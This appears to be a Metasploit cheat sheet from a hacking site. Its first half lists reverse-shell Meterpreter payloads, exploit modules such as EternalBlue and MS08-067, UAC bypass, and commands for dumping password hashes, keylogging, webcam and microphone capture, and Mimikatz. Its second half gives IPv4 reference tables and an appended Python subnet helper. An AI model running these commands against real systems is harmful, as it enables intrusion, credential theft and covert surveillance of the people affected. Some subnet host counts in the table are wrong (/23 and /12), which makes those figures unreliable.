# Metasploit CheatSheet - hacktoday.net
## Meterpreter Payloads

- Windows reverse Meterpreter payload: `set payload windows/meterpreter/reverse_tcp`
- Windows VNC Meterpreter payload: `set payload windows/vncinject/reverse_tcp`, then `set ViewOnly false`
- Linux reverse Meterpreter payload: `set payload linux/meterpreter/reverse_tcp`
- Android reverse Meterpreter payload: `set payload android/meterpreter/reverse_tcp`
## Meterpreter Cheat Sheet

| Command | Description |
|---|---|
| `upload file c:\\windows` | Upload a file to the Windows target |
| `download c:\\windows\\repair\\sam /tmp` | Download a file from the Windows target |
| `execute -f c:\\windows\\temp\\exploit.exe` | Run an .exe on the target |
| `execute -f cmd -c` | Create a new channel with a cmd shell |
| `ps` | Show processes |
| `shell` | Get a shell on the target |
| `getsystem` | Attempt privilege escalation on the target |
| `hashdump` | Dump the password hashes on the target |
| `portfwd add -l 3389 -p 3389 -r target` | Create a port forward to the target machine |
| `portfwd delete -l 3389 -p 3389 -r target` | Delete the port forward |
| `screenshot` | Capture a screenshot of the target machine |
| `keyscan_start` | Start the keylogger |
| `keyscan_dump` | Dump the collected keystrokes |
| `webcam_snap` | Take a webcam snapshot |
| `record_mic` | Record from the microphone |
| `enum_chrome` | Enumerate Chrome browser data |
## :computer: Common Metasploit Modules

### :closed_lock_with_key: Remote Windows Metasploit Modules (exploits)

| Command | Description |
|---|---|
| `use exploit/windows/smb/ms08_067_netapi` | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
| `use exploit/windows/dcerpc/ms06_040_netapi` | MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit |
| `use exploit/windows/smb/ms09_050_smb2_negotiate_func_index` | MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |
| `use exploit/windows/smb/ms17_010_eternalblue` | MS17_010 EternalBlue SMB Remote Windows Kernel Pool Corruption |
### :key: Local Windows Metasploit Modules (exploits)

| Command | Description |
|---|---|
| `use exploit/windows/local/bypassuac` | Bypass UAC on Windows 7+ (set target and arch, x86/x64) |
| `use exploit/windows/local/ms10_015_kitrap0d` | MS10_015 Kitrap0d Local Privilege Escalation |
### :mag: Auxiliary Metasploit Modules

| Command | Description |
|---|---|
| `use auxiliary/scanner/http/dir_scanner` | Metasploit HTTP directory scanner |
| `use auxiliary/scanner/http/jboss_vulnscan` | Metasploit JBoss vulnerability scanner |
| `use auxiliary/scanner/mssql/mssql_login` | Metasploit MSSQL credential scanner |
| `use auxiliary/scanner/mysql/mysql_version` | Metasploit MySQL version scanner |
| `use auxiliary/scanner/oracle/oracle_login` | Metasploit Oracle login module |
### :shell: Metasploit PowerShell Modules

| Command | Description |
|---|---|
| `use exploit/multi/script/web_delivery` | Metasploit PowerShell payload delivery module |
| `use post/windows/manage/powershell/exec_powershell` | Metasploit upload and run a PowerShell script through a session |
| `use exploit/multi/http/jboss_maindeployer` | Metasploit JBoss deploy |
| `use exploit/windows/mssql/mssql_payload` | Metasploit MSSQL payload |
### :wrench: Post Exploit Windows Metasploit Modules

| Command | Description |
|---|---|
| `run post/windows/gather/win_privs` | Metasploit show privileges of the current user |
| `use post/windows/gather/credentials/gpp` | Metasploit grab GPP saved passwords |
| `load mimikatz -> wdigest` | Metasploit load Mimikatz |
| `run post/windows/gather/local_admin_search_enum` | Identify other machines that the supplied domain user has administrative access to |
## :satellite: Networking

### :signal_strength: TTL Fingerprinting

| Operating System | TTL Size |
|---|---|
| Windows | 128 |
| Linux | 64 |
| Solaris | 255 |
| Cisco / Network | 255 |
## IPv4 :earth_americas:

### Classful IP Ranges :chart_with_upwards_trend:

Note: classful addressing (classes A, B, C) is deprecated in favour of CIDR.

| Class | IP Address Range |
|---|---|
| Class A :one: | 0.0.0.0 – 127.255.255.255 |
| Class B :two: | 128.0.0.0 – 191.255.255.255 |
| Class C :three: | 192.0.0.0 – 223.255.255.255 |
| Class D :four: | 224.0.0.0 – 239.255.255.255 |
| Class E :five: | 240.0.0.0 – 255.255.255.255 |
### IPv4 Private Address Ranges :lock:

| Class | Range |
|---|---|
| Class A :one: | 10.0.0.0 – 10.255.255.255 |
| Class B :two: | 172.16.0.0 – 172.31.255.255 |
| Class C :three: | 192.168.0.0 – 192.168.255.255 |
| Loopback :repeat: | 127.0.0.0 – 127.255.255.255 |
### IPv4 Subnet Cheat Sheet :memo:

| CIDR | Decimal Mask | Number of Hosts |
|---|---|---|
| /31 | 255.255.255.254 | 1 Host |
| /30 | 255.255.255.252 | 2 Hosts |
| /29 | 255.255.255.248 | 6 Hosts |
| /28 | 255.255.255.240 | 14 Hosts |
| /27 | 255.255.255.224 | 30 Hosts |
| /26 | 255.255.255.192 | 62 Hosts |
| /25 | 255.255.255.128 | 126 Hosts |
| /24 | 255.255.255.0 | 254 Hosts |
| /23 | 255.255.254.0 | 512 Hosts |
| /22 | 255.255.252.0 | 1022 Hosts |
| /21 | 255.255.248.0 | 2046 Hosts |
| /20 | 255.255.240.0 | 4094 Hosts |
| /19 | 255.255.224.0 | 8190 Hosts |
| /18 | 255.255.192.0 | 16382 Hosts |
| /17 | 255.255.128.0 | 32766 Hosts |
| /16 | 255.255.0.0 | 65534 Hosts |
| /15 | 255.254.0.0 | 131070 Hosts |
| /14 | 255.252.0.0 | 262142 Hosts |
| /13 | 255.248.0.0 | 524286 Hosts |
| /12 | 255.240.0.0 | 1048674 Hosts |
| /11 | 255.224.0.0 | 2097150 Hosts |
| /10 | 255.192.0.0 | 4194302 Hosts |
| /9 | 255.128.0.0 | 8388606 Hosts |
| /8 | 255.0.0.0 | 16777214 Hosts |
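The three IPv4 tables above (classful ranges, private ranges, subnet cheat sheet) are all derivable from a prefix length and an address. The following Python is an added example, not part of the hacktoday.net cheat sheet: it computes the dotted-decimal mask from the prefix, the usable host count with the conventional minus-two rule (treating /31 as the RFC 3021 point-to-point case with two usable addresses and /32 as a single host route, which is this example's assumption rather than the table's convention), the historical class letter from the leading bits, and whether an address falls in the private or loopback ranges listed above. The helper names (`prefix_to_mask`, `usable_hosts`, `classful_class`, `address_scope`, `describe`) are this example's own. For reference, the formula yields 510 usable hosts for /23 and 1,048,574 for /12.

```python
import ipaddress

# Added example (not from the hacktoday.net cheat sheet): derive the
# figures in the IPv4 tables from a prefix length instead of looking them up.

# Constructed from the private/loopback ranges listed on the page.
PRIVATE_RANGES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]
LOOPBACK = ipaddress.ip_network("127.0.0.0/8")


def prefix_to_mask(prefix: int) -> str:
    """Return the dotted-decimal mask for a /prefix (0..32)."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be between 0 and 32")
    # Top `prefix` bits set, the rest clear, truncated to 32 bits.
    mask_int = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    return str(ipaddress.IPv4Address(mask_int))


def usable_hosts(prefix: int) -> int:
    """Usable host addresses in a /prefix.

    Conventional rule: 2^(32 - prefix) minus the network and broadcast
    addresses. /31 is the RFC 3021 point-to-point case (both addresses
    usable) and /32 is a single host route; both are assumptions of this
    example rather than the cheat sheet's convention.
    """
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be between 0 and 32")
    if prefix == 32:
        return 1
    if prefix == 31:
        return 2
    return 2 ** (32 - prefix) - 2


def classful_class(addr: str) -> str:
    """Historical class letter, decided by the first octet's leading bits."""
    first_octet = int(ipaddress.IPv4Address(addr)) >> 24
    if first_octet < 128:   # leading bit 0
        return "A"
    if first_octet < 192:   # leading bits 10
        return "B"
    if first_octet < 224:   # leading bits 110
        return "C"
    if first_octet < 240:   # leading bits 1110 (multicast)
        return "D"
    return "E"              # leading bits 1111 (reserved)


def address_scope(addr: str) -> str:
    """Classify an address as 'loopback', 'private' or 'public'."""
    ip = ipaddress.IPv4Address(addr)
    if ip in LOOPBACK:
        return "loopback"
    if any(ip in net for net in PRIVATE_RANGES):
        return "private"
    return "public"


def describe(cidr: str) -> dict:
    """Summarise a CIDR block: network, prefix, mask, hosts, class, scope."""
    net = ipaddress.ip_network(cidr, strict=False)  # accept a host address
    network = str(net.network_address)
    return {
        "network": network,
        "prefix": net.prefixlen,
        "mask": prefix_to_mask(net.prefixlen),
        "usable_hosts": usable_hosts(net.prefixlen),
        "class": classful_class(network),
        "scope": address_scope(network),
    }


if __name__ == "__main__":
    # Constructed sample inputs covering private, public, host-route cases.
    for cidr in ("192.168.1.0/24", "10.0.0.0/8", "172.16.5.9/22", "8.8.8.8/32"):
        print(describe(cidr))
```

`describe` accepts a host address with a prefix (for example `172.16.5.9/22`) and normalises it to the network address, which is the form in which firewall and IDS allow-lists are usually written; the mask and host count are then read straight off the prefix rather than from the table.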